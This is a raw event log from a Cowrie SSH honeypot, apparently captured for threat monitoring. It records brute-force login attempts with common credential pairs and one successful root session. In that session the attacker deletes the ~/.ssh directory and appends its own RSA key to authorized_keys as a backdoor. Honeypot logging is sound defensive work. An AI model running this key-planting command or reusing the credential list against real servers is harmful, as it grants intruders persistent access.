{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:05:09.922505Z","src_ip":"212.227.235.229","session":"ffff8607d02a"}
{"eventid":"cowrie.login.failed","username":"sun","password":"123456","message":"login attempt [sun/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T16:05:10.922740Z","src_ip":"212.227.235.229","session":"ffff8607d02a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:05:12.166582Z","src_ip":"212.227.235.229","session":"ffff8607d02a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32918,"dst_ip":"1.2.3.4","dst_port":22,"session":"99a704f07b47","protocol":"ssh","message":"New connection: 212.227.235.229:32918 (1.2.3.4:22) [session: 99a704f07b47]","sensor":"my-vps","timestamp":"2025-08-28T16:05:33.753832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:05:33.755013Z","src_ip":"212.227.235.229","session":"99a704f07b47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:05:33.970293Z","src_ip":"212.227.235.229","session":"99a704f07b47"}
{"eventid":"cowrie.login.failed","username":"userftp","password":"123456","message":"login attempt [userftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T16:05:34.870860Z","src_ip":"212.227.235.229","session":"99a704f07b47"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:05:36.089077Z","src_ip":"212.227.235.229","session":"99a704f07b47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49176,"dst_ip":"1.2.3.4","dst_port":23,"session":"4433721a24f4","protocol":"telnet","message":"New connection: 212.227.235.229:49176 (1.2.3.4:23) [session: 4433721a24f4]","sensor":"my-vps","timestamp":"2025-08-28T16:05:43.367275Z"}
{"eventid":"cowrie.session.closed","duration":13.072519302368164,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:05:56.439727Z","src_ip":"212.227.235.229","session":"4433721a24f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46796,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdc561d0d38c","protocol":"ssh","message":"New connection: 212.227.235.229:46796 (1.2.3.4:22) [session: cdc561d0d38c]","sensor":"my-vps","timestamp":"2025-08-28T16:06:07.248229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:06:07.249125Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:06:07.553658Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.login.success","username":"root","password":"Cloud.123","message":"login attempt [root/Cloud.123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:06:08.813020Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:06:09.442932Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:06:09.443769Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:06:09.444930Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:09.751652Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:06:10.416456Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:06:10.417159Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:06:10.729411Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:10.730453Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38040,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e3b6a02a445","protocol":"ssh","message":"New connection: 212.227.235.229:38040 (1.2.3.4:22) [session: 8e3b6a02a445]","sensor":"my-vps","timestamp":"2025-08-28T16:06:11.043399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:06:11.044159Z","src_ip":"212.227.235.229","session":"8e3b6a02a445"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:06:11.358279Z","src_ip":"212.227.235.229","session":"8e3b6a02a445"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:06:12.653619Z","src_ip":"212.227.235.229","session":"8e3b6a02a445"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:13.975966Z","src_ip":"212.227.235.229","session":"8e3b6a02a445"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38048,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1179ccd4604","protocol":"ssh","message":"New connection: 212.227.235.229:38048 (1.2.3.4:22) [session: b1179ccd4604]","sensor":"my-vps","timestamp":"2025-08-28T16:06:14.296324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:06:14.297098Z","src_ip":"212.227.235.229","session":"b1179ccd4604"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:06:14.612857Z","src_ip":"212.227.235.229","session":"b1179ccd4604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62109,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ff3c3a89509","protocol":"ssh","message":"New connection: 212.227.235.229:62109 (1.2.3.4:22) [session: 3ff3c3a89509]","sensor":"my-vps","timestamp":"2025-08-28T16:06:14.725346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:06:14.726266Z","src_ip":"212.227.235.229","session":"3ff3c3a89509"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:06:14.880673Z","src_ip":"212.227.235.229","session":"3ff3c3a89509"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron","message":"login attempt [byron/byron] failed","sensor":"my-vps","timestamp":"2025-08-28T16:06:15.513078Z","src_ip":"212.227.235.229","session":"3ff3c3a89509"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:06:15.933742Z","src_ip":"212.227.235.229","session":"b1179ccd4604"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:16.248884Z","src_ip":"212.227.235.229","session":"cdc561d0d38c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:16.249940Z","src_ip":"212.227.235.229","session":"b1179ccd4604"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron1","message":"login attempt [byron/byron1] failed","sensor":"my-vps","timestamp":"2025-08-28T16:06:16.660753Z","src_ip":"212.227.235.229","session":"3ff3c3a89509"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron123","message":"login attempt [byron/byron123] failed","sensor":"my-vps","timestamp":"2025-08-28T16:06:17.821600Z","src_ip":"212.227.235.229","session":"3ff3c3a89509"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron1234","message":"login attempt [byron/byron1234] failed","sensor":"my-vps","timestamp":"2025-08-28T16:06:18.980646Z","src_ip":"212.227.235.229","session":"3ff3c3a89509"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron12345","message":"login attempt [byron/byron12345] failed","sensor":"my-vps","timestamp":"2025-08-28T16:06:20.155103Z","src_ip":"212.227.235.229","session":"3ff3c3a89509"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52420,"dst_ip":"1.2.3.4","dst_port":22,"session":"606c5e804db6","protocol":"ssh","message":"New connection: 212.227.235.229:52420 (1.2.3.4:22) [session: 606c5e804db6]","sensor":"my-vps","timestamp":"2025-08-28T16:06:20.625550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:06:20.626511Z","src_ip":"212.227.235.229","session":"606c5e804db6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:06:20.852240Z","src_ip":"212.227.235.229","session":"606c5e804db6"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:21.327605Z","src_ip":"212.227.235.229","session":"3ff3c3a89509"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy@2025","message":"login attempt [deploy/deploy@2025] failed","sensor":"my-vps","timestamp":"2025-08-28T16:06:21.796127Z","src_ip":"212.227.235.229","session":"606c5e804db6"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:23.023692Z","src_ip":"212.227.235.229","session":"606c5e804db6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61796,"dst_ip":"1.2.3.4","dst_port":22,"session":"b68891d369fb","protocol":"ssh","message":"New connection: 212.227.125.160:61796 (1.2.3.4:22) [session: b68891d369fb]","sensor":"my-vps","timestamp":"2025-08-28T16:06:33.571156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T16:06:34.444643Z","src_ip":"212.227.125.160","session":"b68891d369fb"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T16:06:35.720246Z","src_ip":"212.227.125.160","session":"b68891d369fb"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:41.883245Z","src_ip":"212.227.125.160","session":"b68891d369fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41368,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e42bc43f524","protocol":"ssh","message":"New connection: 212.227.235.229:41368 (1.2.3.4:22) [session: 7e42bc43f524]","sensor":"my-vps","timestamp":"2025-08-28T16:06:46.039131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:06:46.040100Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
